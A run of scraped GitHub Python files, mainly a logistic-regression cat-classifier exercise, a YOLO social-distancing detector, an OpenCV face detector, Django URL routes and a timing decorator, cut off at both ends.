3)\")\r\nprint (\"train_set_x shape: \" + str(train_set_x_orig.shape))\r\nprint (\"train_set_y shape: \" + str(train_set_y.shape))\r\nprint (\"test_set_x shape: \" + str(test_set_x_orig.shape))\r\nprint (\"test_set_y shape: \" + str(test_set_y.shape))\r\n\r\n\r\n# For convenience, you should now reshape images of shape (num_px, num_px, 3) in a\r\n# numpy-array of shape (num_px ∗ num_px ∗ 3, 1). After this, our training (and test)\r\n# dataset is a numpy-array where each column represents a flattened image. 
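As a quick sanity check of the flattening step described above, a minimal standalone sketch (using a small dummy array in place of the real cat dataset) confirms that `X.reshape(X.shape[0], -1).T` really puts one flattened image per column:

```python
import numpy as np

# Dummy stand-in for train_set_x_orig: 5 images of 4x4 pixels, 3 channels.
X = np.arange(5 * 4 * 4 * 3).reshape(5, 4, 4, 3)

# Flatten: one column per image, num_px * num_px * 3 rows.
X_flatten = X.reshape(X.shape[0], -1).T
print(X_flatten.shape)  # (48, 5)

# Column j holds exactly the pixels of image j, in row-major order.
assert (X_flatten[:, 2] == X[2].ravel()).all()
```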
There should\r\n# be m_train (respectively m_test) columns.\r\n\r\n# A trick when you want to flatten a matrix X of shape (a,b,c,d) to a matrix X_flatten of\r\n# shape (b ∗ c ∗ d, a) is to use:\r\n\r\n# X_flatten = X.reshape(X.shape[0], -1).T # X.T is the transpose of X\r\n\r\n# Reshape the training and test examples\r\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\r\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\r\n\r\nprint (\"train_set_x_flatten shape: \" + str(train_set_x_flatten.shape))\r\nprint (\"train_set_y shape: \" + str(train_set_y.shape))\r\nprint (\"test_set_x_flatten shape: \" + str(test_set_x_flatten.shape))\r\nprint (\"test_set_y shape: \" + str(test_set_y.shape))\r\n\r\n\r\n# To represent color images, the red, green and blue channels (RGB) must be specified for\r\n# each pixel, and so the pixel value is actually a vector of three numbers ranging from 0 to 255.\r\n\r\n# One common preprocessing step in machine learning is to center and standardize your\r\n# dataset, meaning that you subtract the mean of the whole numpy array from each example,\r\n# and then divide each example by the standard deviation of the whole numpy array.\r\n# But for picture datasets, it is simpler and more convenient and works almost as well\r\n# to just divide every row of the dataset by 255 (the maximum value of a pixel channel).\r\n\r\n# Let's standardize our dataset.\r\ntrain_set_x = train_set_x_flatten / 255.\r\ntest_set_x = test_set_x_flatten / 255.\r\n\r\n# What you need to remember:\r\n\r\n# Common steps for pre-processing a new dataset are:\r\n\r\n# Figure out the dimensions and shapes of the problem (m_train, m_test, num_px, ...)\r\n# Reshape the datasets such that each example is now a vector of size (num_px * num_px * 3, 1)\r\n# \"Standardize\" the data\r\n\r\n\r\n#### Mathematical expression of the algorithm:\r\n\r\n#For one example 𝑥(𝑖):\r\n#𝑧(𝑖)=𝑤.𝑇 𝑥(𝑖)+𝑏\r\n#𝑦̂ (𝑖)=𝑎(𝑖)=𝑠𝑖𝑔𝑚𝑜𝑖𝑑(𝑧(𝑖))\r\n#L(𝑎(𝑖),𝑦(𝑖))=−𝑦(𝑖)log(𝑎(𝑖))−(1−𝑦(𝑖))log(1−𝑎(𝑖))\r\n#The cost is then computed by summing over all training examples:\r\n#J=(1/𝑚)∑𝑖=1 to 𝑚 L(𝑎(𝑖),𝑦(𝑖))\r\n\r\n#### The main steps for building a Neural Network are:\r\n\r\n# 1- Define the model structure (such as number of input features)\r\n# 2- Initialize the model's parameters\r\n# 3- Loop:\r\n#     - Calculate current loss (forward propagation)\r\n#     - Calculate current gradient (backward propagation)\r\n#     - Update parameters (gradient descent)\r\n# You often build 1-3 separately and integrate them into one function we call model()\r\n\r\n# GRADED FUNCTION: sigmoid\r\n\r\ndef sigmoid(z):\r\n    \"\"\"\r\n    Compute the sigmoid of z\r\n\r\n    Arguments:\r\n    z -- A scalar or numpy array of any size.\r\n\r\n    Return:\r\n    s -- sigmoid(z)\r\n    \"\"\"\r\n    s = 1/(1+np.exp(-z))\r\n    return s\r\n\r\n\r\n# quick sanity check of sigmoid on a small array\r\nz = np.array([0, 2])\r\nsigmoid(z)\r\n\r\n\r\n# GRADED FUNCTION: initialize_with_zeros\r\n\r\ndef initialize_with_zeros(dim):\r\n    \"\"\"\r\n    This function creates a vector of zeros of shape (dim, 1) for w and initializes b to 0.\r\n\r\n    Argument:\r\n    dim -- size of the w vector we want (or number of parameters in this case)\r\n\r\n    Returns:\r\n    w -- initialized vector of shape (dim, 1)\r\n    b -- initialized scalar (corresponds to the bias) of type float\r\n    \"\"\"\r\n    w = np.zeros((dim, 1))  # float zeros with the promised (dim, 1) shape\r\n    b = 0.\r\n    return w, b\r\n\r\ndim = 2\r\ninitialize_with_zeros(dim)\r\n\r\n\r\n# GRADED FUNCTION: propagate\r\n\r\ndef propagate(w, b, X, Y):\r\n    \"\"\"\r\n    Implement the cost 
function and its gradient for the propagation explained above\r\n\r\n Arguments:\r\n w -- weights, a numpy array of size (num_px * num_px * 3, 1)\r\n b -- bias, a scalar\r\n X -- data of size (num_px * num_px * 3, number of examples)\r\n Y -- true \"label\" vector (containing 0 if non-cat, 1 if cat) of size (1, number of examples)\r\n\r\n Return:\r\n cost -- negative log-likelihood cost for logistic regression\r\n dw -- gradient of the loss with respect to w, thus same shape as w\r\n db -- gradient of the loss with respect to b, thus same shape as b\r\n\r\n Tips:\r\n - Write your code step by step for the propagation. np.log(), np.dot()\r\n \"\"\"\r\n m = X.shape[1]\r\n # FORWARD PROPAGATION (FROM X TO COST)\r\n # compute activation\r\n A = sigmoid(np.dot(w.T,X)+b)\r\n # compute cost by using np.dot to perform multiplication.\r\n # And don't use loops for the sum.\r\n cost=(-1/m)*sum(sum(((Y*np.log(A))+(((1-Y)*np.log(1-A))))))\r\n # BACKWARD PROPAGATION (TO FIND GRAD)\r\n dw =(1/m)*np.dot(X,(A-Y).T)\r\n db=1/m*sum(sum(A-Y))\r\n cost = np.squeeze(np.array(cost))\r\n grads = {\"dw\": dw,\r\n \"db\": db}\r\n return grads, cost\r\n\r\n\r\n\r\nw = np.array([[1.], [2]])\r\nb = 1.5\r\nX = np.array([[1., -2., -1.], [3., 0.5, -3.2]])\r\nY = np.array([[1, 1, 0]])\r\ngrads, cost = propagate(w, b, X, Y)\r\n\r\n\r\n#### Optimization\r\n#Write down the optimization function. The goal is to learn 𝑤 and 𝑏 by minimizing the\r\n# cost function 𝐽 . For a parameter 𝜃 , the update rule is 𝜃=𝜃−𝛼 𝑑𝜃 , where 𝛼 is the\r\n# learning rate.\r\n\r\n# GRADED FUNCTION: optimize\r\n\r\ndef optimize(w, b, X, Y, num_iterations=100, learning_rate=0.009, print_cost=False):\r\n \"\"\"\r\n This function optimizes w and b by running a gradient descent algorithm\r\n #\r\n Arguments:\r\n w -- weights, a numpy array of size (num_px * num_px * 3, 1)\r\n b -- bias, a scalar\r\n X -- data of shape (num_px * num_px * 3, number of examples)\r\n Y -- true \"label\" vector (containing 0 if non-cat, 1 if cat), of shape (1, number of examples)\r\n num_iterations -- number of iterations of the optimization loop\r\n learning_rate -- learning rate of the gradient descent update rule\r\n print_cost -- True to print the loss every 100 steps\r\n #\r\n Returns:\r\n params -- dictionary containing the weights w and bias b\r\n grads -- dictionary containing the gradients of the weights and bias with respect to the cost function\r\n costs -- list of all the costs computed during the optimization, this will be used to plot the learning curve.\r\n #\r\n Tips:\r\n You basically need to write down two steps and iterate through them:\r\n 1) Calculate the cost and the gradient for the current parameters. 
Use propagate().\r\n 2) Update the parameters using gradient descent rule for w and b.\r\n \"\"\"\r\n w = copy.deepcopy(w)\r\n b = copy.deepcopy(b)\r\n costs = []\r\n for i in range(num_iterations):\r\n # Cost and gradient calculation\r\n grads, cost = propagate(w,b,X,Y)\r\n # Retrieve derivatives from grads\r\n dw = grads[\"dw\"]\r\n db = grads[\"db\"]\r\n # update rule\r\n w=w-learning_rate*dw\r\n b=b-learning_rate*db\r\n # Record the costs\r\n if i % 100 == 0:\r\n costs.append(cost)\r\n # Print the cost every 100 training iterations\r\n if print_cost:\r\n print (\"Cost after iteration %i: %f\" %(i, cost))\r\n params = {\"w\": w,\r\n \"b\": b}\r\n grads = {\"dw\": dw,\r\n \"db\": db}\r\n return params, grads, costs\r\n\r\nparams, grads, costs = optimize(w, b, X, Y, num_iterations=100, learning_rate=0.009, print_cost=False)\r\n\r\n#### predict\r\n# - Calculate 𝑌̂ =𝐴=𝜎(𝑤𝑇𝑋+𝑏)\r\n# - Convert the entries of a into 0 (if activation <= 0.5) or 1 (if activation > 0.5),\r\n# stores the predictions in a vector Y_prediction. If you wish, you can use an if/else\r\n# statement in a for loop (though there is also a way to vectorize this).\r\n\r\n# GRADED FUNCTION: predict\r\n\r\ndef predict(w, b, X):\r\n '''\r\n Predict whether the label is 0 or 1 using learned logistic regression parameters (w, b)\r\n #\r\n Arguments:\r\n w -- weights, a numpy array of size (num_px * num_px * 3, 1)\r\n b -- bias, a scalar\r\n X -- data of size (num_px * num_px * 3, number of examples)\r\n #\r\n Returns:\r\n Y_prediction -- a numpy array (vector) containing all predictions (0/1) for the examples in X\r\n '''\r\n #\r\n m = X.shape[1]\r\n Y_prediction = np.zeros((1, m))\r\n w = w.reshape(X.shape[0], 1)\r\n # Compute vector \"A\" predicting the probabilities of a cat being present in the picture\r\n A =sigmoid(np.dot(w.T,X)+b)\r\n for i in range(A.shape[1]):\r\n # Convert probabilities A[0,i] to actual predictions p[0,i]\r\n if A[0, i] > 0.5 :\r\n Y_prediction[0,i] = 1\r\n else:\r\n Y_prediction[0,i] = 0\r\n return Y_prediction\r\n\r\nw = np.array([[0.1124579], [0.23106775]])\r\nb = -0.3\r\nX = np.array([[1., -1.1, -3.2],[1.2, 2., 0.1]])\r\npredict(w, b, X)\r\n#### What to remember:\r\n## You've implemented several functions that:\r\n## Initialize (w,b)\r\n##Optimize the loss iteratively to learn parameters (w,b):\r\n## Computing the cost and its gradient\r\n## Updating the parameters using gradient descent\r\n##Use the learned (w,b) to predict the labels for a given set of examples\r\n\r\n\r\n# GRADED FUNCTION: model\r\n\r\ndef model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False):\r\n \"\"\"\r\n Builds the logistic regression model by calling the function you've implemented previously\r\n\r\n Arguments:\r\n X_train -- training set represented by a numpy array of shape (num_px * num_px * 3, m_train)\r\n Y_train -- training labels represented by a numpy array (vector) of shape (1, m_train)\r\n X_test -- test set represented by a numpy array of shape (num_px * num_px * 3, m_test)\r\n Y_test -- test labels represented by a numpy array (vector) of shape (1, m_test)\r\n num_iterations -- hyperparameter representing the number of iterations to optimize the parameters\r\n learning_rate -- hyperparameter representing the learning rate used in the update rule of optimize()\r\n print_cost -- Set to True to print the cost every 100 iterations\r\n\r\n Returns:\r\n d -- dictionary containing information about the model.\r\n \"\"\"\r\n # initialize parameters with zeros\r\n 
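# (a zero start is fine for logistic regression: the cost is convex, so there is\r\n    # no symmetry-breaking concern as there would be in a deeper network)\r\n    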
w,b=initialize_with_zeros(X_train.shape[0])\r\n # Gradient descent\r\n # params, grads, costs = ...\r\n params, grads, costs=optimize(w, b, X_train, Y_train, num_iterations=num_iterations, learning_rate=learning_rate, print_cost=False)\r\n # Retrieve parameters w and b from dictionary \"params\"\r\n w=params['w']\r\n b=params['b']\r\n # Predict test/train set examples\r\n Y_prediction_test = predict(w,b,X_test)\r\n Y_prediction_train = predict(w,b,X_train)\r\n # Print train/test Errors\r\n if print_cost:\r\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\r\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\r\n d = {\"costs\": costs,\r\n \"Y_prediction_test\": Y_prediction_test,\r\n \"Y_prediction_train\" : Y_prediction_train,\r\n \"w\" : w,\r\n \"b\" : b,\r\n \"learning_rate\" : learning_rate,\r\n \"num_iterations\": num_iterations}\r\n return d\r\n\r\n# train your model\r\ndim=X.shape[0]\r\nlogistic_regression_model = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations=2000, learning_rate=0.005, print_cost=True)\r\n\r\n# Example of a picture that was wrongly classified.\r\nindex = 8\r\nplt.imshow(test_set_x[:, index].reshape((num_px, num_px, 3)))\r\nprint (\"y = \" + str(test_set_y[0,index]) + \", you predicted that it is a \\\"\" + classes[int(logistic_regression_model['Y_prediction_test'][0,index])].decode(\"utf-8\") + \"\\\" picture.\")\r\nplt.show()\r\n\r\n#Let's also plot the cost function and the gradients.\r\n# Plot learning curve (with costs)\r\ncosts = np.squeeze(logistic_regression_model['costs'])\r\nplt.plot(costs)\r\nplt.ylabel('cost')\r\nplt.xlabel('iterations (per hundreds)')\r\nplt.title(\"Learning rate =\" + str(logistic_regression_model[\"learning_rate\"]))\r\nplt.show()\r\n#Interpretation: You can see the cost decreasing. It shows that the parameters are being\r\n# learned. However, you see that you could train the model even more on the training set.\r\n# Try to increase the number of iterations in the cell above and rerun the cells. You might\r\n# see that the training set accuracy goes up, but the test set accuracy goes down. This is\r\n# called overfitting.\r\n\r\n\r\n\r\n\r\n#Choice of learning rate\r\n#Reminder: In order for Gradient Descent to work you must choose the learning rate wisely.\r\n# The learning rate 𝛼 determines how rapidly we update the parameters. If the learning rate\r\n# is too large we may \"overshoot\" the optimal value. Similarly, if it is too small we will\r\n# need too many iterations to converge to the best values. That's why it is crucial to use\r\n# a well-tuned learning rate.\r\n\r\n#Let's compare the learning curve of our model with several choices of learning rates. Run\r\n# the cell below. This should take about 1 minute. 
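The docstring of predict() above notes that the 0/1 thresholding loop can also be vectorized. A minimal sketch of that alternative (the name predict_vectorized is illustrative, and the sigmoid is inlined so the snippet stands alone):

```python
import numpy as np

def predict_vectorized(w, b, X):
    # Same contract as predict() above, but the whole activation row is
    # thresholded at once instead of looping over the columns.
    A = 1 / (1 + np.exp(-(np.dot(w.T, X) + b)))  # sigmoid(w.T X + b)
    return (A > 0.5).astype(float)

# Same toy values as the predict() check above.
w = np.array([[0.1124579], [0.23106775]])
b = -0.3
X = np.array([[1., -1.1, -3.2], [1.2, 2., 0.1]])
print(predict_vectorized(w, b, X))
```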
Feel free also to try different values\r\n# than the three we have initialized the learning_rates variable to contain, and see what\r\n# happens.\r\nlearning_rates = [0.01, 0.001, 0.0001]\r\nmodels = {}\r\n\r\nfor lr in learning_rates:\r\n print (\"Training a model with learning rate: \" + str(lr))\r\n models[str(lr)] = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations=1500, learning_rate=lr, print_cost=False)\r\n print ('\\n' + \"-------------------------------------------------------\" + '\\n')\r\n\r\nfor lr in learning_rates:\r\n plt.plot(np.squeeze(models[str(lr)][\"costs\"]), label=str(models[str(lr)][\"learning_rate\"]))\r\n\r\nplt.ylabel('cost')\r\nplt.xlabel('iterations (hundreds)')\r\n\r\nlegend = plt.legend(loc='upper center', shadow=True)\r\nframe = legend.get_frame()\r\nframe.set_facecolor('0.90')\r\nplt.show()\r\n\r\n\r\n\r\n#Interpretation:\r\n#Different learning rates give different costs and thus different predictions results.\r\n#If the learning rate is too large (0.01), the cost may oscillate up and down. It may even\r\n# diverge (though in this example, using 0.01 still eventually ends up at a good value for the cost).\r\n#A lower cost doesn't mean a better model. You have to check if there is possibly overfitting.\r\n# It happens when the training accuracy is a lot higher than the test accuracy.\r\n#In deep learning, we usually recommend that you:\r\n#Choose the learning rate that better minimizes the cost function.\r\n#If your model overfits, use other techniques to reduce overfitting.\r\n\r\n\r\n\r\n# change this to the name of your image file\r\nmy_image = \"my_image.jpg\"\r\n\r\n# We preprocess the image to fit your algorithm.\r\nfname = \"images/\" + my_image\r\nimage = np.array(Image.open(fname).resize((num_px, num_px)))\r\nplt.imshow(image)\r\nimage = image / 255.\r\nimage = image.reshape((1, num_px * num_px * 3)).T\r\nmy_predicted_image = predict(logistic_regression_model[\"w\"], logistic_regression_model[\"b\"], image)\r\n\r\nprint(\"y = \" + str(np.squeeze(my_predicted_image)) + \", your algorithm predicts a \\\"\" + classes[int(np.squeeze(my_predicted_image)),].decode(\"utf-8\") + \"\\\" picture.\")\r\n\r\n\r\n#What to remember from this assignment:\r\n\r\n#Preprocessing the dataset is important.\r\n#You implemented each function separately: initialize(), propagate(), optimize().\r\n# Then you built a model().\r\n#Tuning the learning rate (which is an example of a \"hyperparameter\") can make a big\r\n# difference to the algorithm. 
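The overshoot/slow-convergence trade-off described here is easy to reproduce in isolation. A toy sketch on f(θ) = θ², whose gradient is 2θ (the learning-rate values below are illustrative only):

```python
# Gradient descent on f(theta) = theta**2, minimum at theta = 0.
for lr in [0.01, 0.4, 1.1]:
    theta = 1.0
    for _ in range(50):
        theta -= lr * 2 * theta  # theta <- theta - lr * f'(theta)
    print(f"lr={lr}: theta after 50 steps = {theta:.3e}")

# lr=0.01 creeps toward 0 slowly, lr=0.4 converges quickly, and lr=1.1
# diverges because every step overshoots the minimum.
```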
You will see more examples of this later in this course!\r\n","repo_name":"kiansina/ML_Neural_Networks","sub_path":"Week2/2_app_Logistic.py","file_name":"2_app_Logistic.py","file_ext":"py","file_size_in_byte":18173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71461538154","text":"from py import social_distancing_config as config\nfrom py.map import heatmapper\nfrom py.map import flowmapper\nfrom py import pathfind\nfrom py import plot as plot_\nfrom py.detection import detect_people\nfrom scipy.spatial import distance as dist\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport os\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", type=str, default=\"\",\n help=\"path to (optional) input video file\")\nap.add_argument(\"-o\", \"--output\", type=str, default=\"\",\n help=\"path to (optional) output video file\")\nap.add_argument(\"-d\", \"--display\", type=int, default=1,\n help=\"whether or not output frame should be displayed\")\nargs = vars(ap.parse_args())\n\n# load the COCO class labels our YOLO model was trained on\nlabelsPath = os.path.sep.join([config.MODEL_PATH, \"coco.names\"])\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\n# derive the paths to the YOLO weights and model configuration\nweightsPath = os.path.sep.join([config.MODEL_PATH, \"yolov3.weights\"])\nconfigPath = os.path.sep.join([config.MODEL_PATH, \"yolov3.cfg\"])\n\n# load our YOLO object detector trained on COCO dataset (80 classes)\nprint(\"[INFO] loading YOLO from disk...\")\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n# check if we are going to use GPU\nif config.USE_GPU:\n # set CUDA as the preferable backend and target\n print(\"[INFO] setting preferable backend and target to CUDA...\")\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n\n# determine only the *output* layer names that we need from YOLO\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# initialize the video stream and pointer to output video file\nprint(\"[INFO] accessing video stream...\")\nvs = cv2.VideoCapture(args[\"input\"] if args[\"input\"] else 0)\n\n# record program iteration to get average\niteration = 1\n\n# frame skipping\nframe_skip = False\n\n# plot\nplot = None\nfig = None\ninit = True\n\n# loop over the frames from the video stream\nwhile True:\n # skip one out of two frames to increase speed\n if frame_skip:\n # set frame_skip to false to not skip frame next iteration\n frame_skip = False\n continue\n else:\n # set frame_skip to true to skip frame next iteration\n frame_skip = True\n\n # this means that frame_skip will toggle true/false for every frame\n # thus skipping half the frames and making it twice as quick\n\n # read the next frame from the file\n (grabbed, frame) = vs.read()\n # if the frame was not grabbed, then we have reached the end\n # of the stream\n if not grabbed:\n break\n # resize the frame and then detect people (and only people) in it\n frame = imutils.resize(frame, width=700)\n results = detect_people(frame, net, ln,\n personIdx=LABELS.index(\"person\"))\n # initialize the set of indexes that violate the minimum social\n # distance\n violate = set()\n\n # ensure there are *at least* two people detections (required in\n # order to compute our pairwise distance maps)\n if len(results) >= 2:\n # extract all centroids from the results 
and compute the\n # Euclidean distances between all pairs of the centroids\n violate_centroids = np.array([r[2] for r in results])\n D = dist.cdist(violate_centroids, violate_centroids, metric=\"euclidean\")\n # loop over the upper triangular of the distance matrix\n for i in range(0, D.shape[0]):\n for j in range(i + 1, D.shape[1]):\n # check to see if the distance between any two\n # centroid pairs is less than the configured number\n # of pixels\n if D[i, j] < config.MIN_DISTANCE:\n # update our violation set with the indexes of\n # the centroid pairs\n violate.add(i)\n violate.add(j)\n\n # create groups of people\n violate_centroids = []\n non_violate_centroids = []\n\n # loop over the results\n for (i, (prob, bbox, centroid)) in enumerate(results):\n # extract the bounding box and centroid coordinates, then\n # initialize the color of the annotation\n (startX, startY, endX, endY) = bbox\n (cX, cY) = centroid\n\n color = (0, 255, 0)\n # if the index pair exists within the violation set, then\n # update the color\n\n # rescale centroids to fit final output frame\n resize_x = int((config.OUTPUT_X / frame.shape[1]) * cX)\n resize_y = int((config.OUTPUT_Y / frame.shape[0]) * cY)\n\n # if person violates social distancing\n if i in violate:\n # change bounding box color\n color = (0, 0, 255)\n\n # add person to violate list\n violate_centroids.append((resize_x, resize_y))\n else:\n # else: add person to non-violate list\n non_violate_centroids.append((resize_x, resize_y))\n\n # draw (1) a bounding box around the person and (2) the\n # centroid coordinates of the person,\n cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n cv2.circle(frame, (cX, cY), 5, color, 1)\n\n # get person centroids by adding violations and non-violations\n all_centroids = []\n for centroid in violate_centroids:\n all_centroids.append((centroid[0], centroid[1], True))\n for centroid in non_violate_centroids:\n all_centroids.append((centroid[0], centroid[1], False))\n\n # resize frame to output size\n frame = cv2.resize(frame, (config.OUTPUT_X, config.OUTPUT_Y))\n\n # generate heatmap using py/map/heatmapper.py\n heatmap, average = heatmapper.getMap(all_centroids, frame, iteration)\n\n # generate flowmap using py/map/flowmapper.py\n flowmap = flowmapper.getMap(all_centroids)\n\n # wait for some iterations to go by, making sure there is some data in average\n if iteration > 10:\n # get safest coords with /py/pathfind.py\n safest_centroid = pathfind.getSafestPerson(non_violate_centroids, average)\n\n # draw filled white rectangle of where the safest centroid is\n cv2.rectangle(frame, (safest_centroid[0] * config.BLOCKSIZE_X, safest_centroid[1] * config.BLOCKSIZE_Y),\n (\n (safest_centroid[0] + 1) * config.BLOCKSIZE_X,\n (safest_centroid[1] + 1) * config.BLOCKSIZE_Y),\n (252, 152, 3), -1)\n\n # pathfinding using py/pathfind.py\n path = pathfind.getPath(average, safest_centroid)\n\n # if path is ok, ie not empty\n if path is not None:\n # create empty frame with same shape as frame\n empty = np.zeros(frame.shape, np.uint8)\n # iterate over every spot\n # horizontally\n for x in range(config.ZONES_X):\n # vertically\n for y in range(config.ZONES_Y):\n # if current spot is part of the viable path\n if path[x][y] == 1:\n # draw a filled white rectangle at this specific spot\n cv2.rectangle(empty, (x * config.BLOCKSIZE_X, y * config.BLOCKSIZE_Y),\n ((x + 1) * config.BLOCKSIZE_X, (y + 1) * config.BLOCKSIZE_Y),\n (255, 255, 255), -1)\n # overlay the empty frame to the main frame\n # to have the filled white 
rectangles representing the path overlaid onto the video footage\n            frame = cv2.addWeighted(frame, 1.0, empty, 0.25, 1)\n\n        # global init, plot, fig\n        x, y = pathfind.findRegressionLine(path)\n        # initialize the plot at the first iteration only\n        if init:\n            # init py/plot.py\n            # returns plot and fig objects, that are now global\n            # meaning that the next iterations can access them\n            # to be able to update the plot every time the loop runs\n            plot, fig = plot_.init(x, y)\n            # set init to false so that the next iteration\n            # will update the plot instead of init\n            init = False\n        else:\n            # update plot and get the frame along with the results\n            img, results = plot_.update(x, y, plot, fig)\n            # if user wants to display regression plot do so right now\n            if config.SHOW_REGRESSION:\n                cv2.imshow(\"plot\", img)\n\n            # draw regression line onto frame\n            frame = plot_.drawLine(frame, x, results)\n\n    # iterate over every line generated by flowmap\n    for line in flowmap:\n        # draw every line onto frame\n        cv2.line(heatmap, line[0], line[1], (255, 255, 255), 2)\n\n    # stack frame and heatmap horizontally for displaying\n    output_frame = np.hstack((frame, heatmap))\n\n    # show the output frame\n    cv2.imshow(\"Frame\", output_frame)\n\n    # quit program if q is pressed\n    key = cv2.waitKey(1) & 0xFF\n    if key == ord(\"q\"):\n        break\n\n    # print iteration\n    print(\"[INFO] frame {i}, {v} social distance violations\".format(i=iteration, v=len(violate)))\n\n    # increment iteration every time the loop runs\n    iteration += 1\n\n# cleanup\nvs.release()\ncv2.destroyAllWindows()\n","repo_name":"ThatAquarel/SocialDistancePathfinder","sub_path":"social_distance_detector.py","file_name":"social_distance_detector.py","file_ext":"py","file_size_in_byte":9962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"26689748722","text":"\"\"\"\n************************************************************************************************************************************************\nPython 3.x code to detect faces in a given image.\nDeveloped by: Ing. Ronny Díaz Lopez\nWe use the OpenCV library and the Viola-Jones detector, which includes a Haar cascade classifier.\nTuesday, June 7, 2022\n\nFor more information see the article \"OpenCV Python (Parte 1 y 2)\", published by me on the\nblog of the company Hepyco Software at the link: https://www.hepyco.com/blog/programacion/opencv-python-parte-1-de-2/\n************************************************************************************************************************************************\n\"\"\"\n\n# We import the 2 libraries we will work with: cv2 from OpenCV and numpy.\nimport cv2\nimport numpy\n\n\"\"\"\nHere we set the default values of the paths to the two files the program needs in order to run correctly. One is the path stored in the variable rutaImagen, which can also be supplied from the system terminal from which we run the program; in this case it is the same root folder that contains our program detecta_rostros.py. The other is the path stored in the variable rutaClasificador, which points to the file containing the Haar classifier for face detection, in this case clasificadorhaar_viola-jones_rostro.xml.\nIn this example the test (source) image is called imagen.jpg and is located in the same root folder as our Python program.\n\n\"\"\"\n#rutaImagen = sys.argv[1]\nrutaImagen = \"imagen.jpeg\"\nrutaClasificador = \"clasificadorhaar_viola-jones_rostro.xml\"\n\n# Here we create the Haar cascade using the classifier loader built into the OpenCV library.\ncascadaRostro = cv2.CascadeClassifier(rutaClasificador)\n\n# Now we read the image and convert it to grayscale to prepare it for the Viola-Jones classifier.\nimagen = cv2.imread(rutaImagen)\ngray = cv2.cvtColor(imagen, cv2.COLOR_BGR2GRAY)\n\n# Detect the faces in the supplied image\nrostros = cascadaRostro.detectMultiScale(\n    gray,\n    scaleFactor=1.1,\n    minNeighbors=5,\n    minSize=(30, 30),\n    maxSize=(200, 200),\n    flags = cv2.CASCADE_SCALE_IMAGE\n)\n\nprint(\"Encontramos {0} rostros!\".format(len(rostros)))\n\n# Now we draw a rectangle around the detected faces\nfor (x, y, w, h) in rostros:\n    cv2.rectangle(imagen, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\ncv2.imshow(\"Rostros Encontrados\", imagen)\ncv2.waitKey(0) # The window keeps showing the detected faces until any key is pressed, then the program ends.\ncv2.destroyAllWindows()\n","repo_name":"ronnynations21/Python-IA","sub_path":"Artificial-Intelligence/haar-viola-jones-classifier/haar-viola-jones-classifier-main/detecta_rostros.py","file_name":"detecta_rostros.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"19185929163","text":"from django.conf.urls import url \nfrom . 
import views\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n url('^$',views.home, name='home'),\n url('signup/', auth_views.LoginView.as_view(template_name='registration/registration_form.html'),name= 'signup'),\n url('login/', auth_views.LoginView.as_view(template_name='registration/login.html'),name= 'login'),\n url('logout/', auth_views.LogoutView.as_view(template_name='auth/logout.html'), name='logout'),\n url('profile/',views.profile, name='profile'),\n url('update/',views.update_profile,name='update_profile'),\n url('add_neighbourhood/',views.add_neighbourhood,name='add_neighbourhood'),\n url('add_business/',views.add_business,name='add_business'),\n url('business/',views.business,name=\"business\"),\n url('add_post/',views.add_post,name=\"add_post\"),\n url(r'^join_neighbourhood/(?P<hood_id>\\d+)$',views.join_neighbourhood,name='join'),\n url(r'^leave_neighbourhood/(?P<hood_id>\\d+)$',views.leave_neighbourhood,name='leave'),\n url(r'^s_neighbourhood/(?P<hood_id>\\d+)$',views.s_neighbourhood,name='details'),\n]","repo_name":"owinolawrence/neighborhood","sub_path":"hood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37439876520","text":"# from functools import wraps\r\nfrom time import time\r\n\r\n# https://dev.to/kcdchennai/python-decorator-to-measure-execution-time-54hk & ci\r\n\r\ndef timeit(func):\r\n # @wraps(func)\r\n def _timeit_wrapper(*args, **kwargs):\r\n start_time = time()\r\n result = func(*args, **kwargs)\r\n end_time = time()\r\n total_time = end_time - start_time\r\n print(\r\n # f'Function {func.__name__}{args} {kwargs} executed in {total_time:.4f} seconds')\r\n f'Function {func.__name__} executed in {total_time:.4f} seconds')\r\n return result\r\n return _timeit_wrapper\r\n\r\n\r\n# test\r\n@timeit\r\ndef _calculate_something(num):\r\n \"\"\"\r\n Simple function that returns sum of all numbers up to the square of num.\r\n \"\"\"\r\n total = sum((x for x in range(0, num**2)))\r\n return total\r\n\r\n\r\nif __name__ == '__main__':\r\n _calculate_something(10)\r\n _calculate_something(100)\r\n","repo_name":"francescoamat0/statistical_inference_testing_playground","sub_path":"execution_time_func_decorator.py","file_name":"execution_time_func_decorator.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5650145250","text":"#part1\r\nx=6\r\ny=2\r\nx>=y and (x/y)>2 \r\n\r\n#part2\r\nx=1\r\ny=0\r\nx>=2 and (x/y)>2 #if first condition if false then 2nd is automaticaly considered false called short-circuiting\r\n\r\n#part3\r\nx=6\r\ny=0\r\n#comment below line when compiling\r\n#x 